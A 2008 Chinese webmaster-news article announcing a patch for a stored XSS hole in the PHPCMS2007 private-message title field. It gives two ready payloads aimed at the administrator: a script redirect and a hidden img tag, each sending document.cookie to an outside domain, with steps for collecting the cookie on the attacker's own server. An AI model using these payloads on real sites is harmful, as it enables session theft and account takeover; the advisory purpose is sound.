Chinaz.com - 中国站长站

匿名投稿 投稿指南 RSS订阅 站长资讯通告:
搜索: 您的位置主页>新闻资讯>厂商开发>阅读资讯:PHPCMS2007 为短消息安全漏洞更新补丁

PHPCMS2007 为短消息安全漏洞更新补丁

2008-08-05 21:26:47 来源:中国站长站 作者:编辑整理 【 评论:0

核心提示:今日,在PHPCMS官方社区发布一则更新补丁,称PHPCMS短消息功能存在严重安全漏洞,已足以窃取会员的Cookie,进行挂马,官方已发布补丁,请各位PHPCMS用户及时更新补丁,避免造成不必要的损失。

发送信息时,信息内容经过了转义,但是标题呢,并没有转义,问题就在这里!而且标题最大长度是255,这足以构造一些恶意的脚本,从而导致一些页面重定制,甚至窃取其它会员的cookie,也可造成通过被动式挂马漏洞。

打开发送消息界面,发送到填写管理员的username,标题比方如下:

<script>location='http://www.doamin.cn/fsda.php?k='+escape(document.cookie);</script>

其中的http://www.doamin.cn/fsda.php是你自己的域名下用来接收cookie的一个php文件。

这样一来,当对方打开收件箱时,网站将无条件跳转到你的域名,并告诉你此管理员的cookie了,既然没有做任何屏蔽,你就可以输入任何内容了!

更隐蔽一些的效果呢?不让页面重定向,并窃取cookie:

<img style="display:none" onload=this.src='http://domain.cn/k.php?k='+escape(document.cookie)  />

这样将成为更隐蔽的cookie窃取方法

将压缩包中的文件解压,并覆盖之message/下即可。

中国站长站分流:短信安全漏洞补丁下载



Tags:PHPCMS漏洞   安全补丁  
责任编辑:阻击者
  • 请文明参与讨论,禁止漫骂攻击。 用户名:新注册) 密码: 匿名:
    评论总数: [ 查看全部 ] 网友评论
    关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助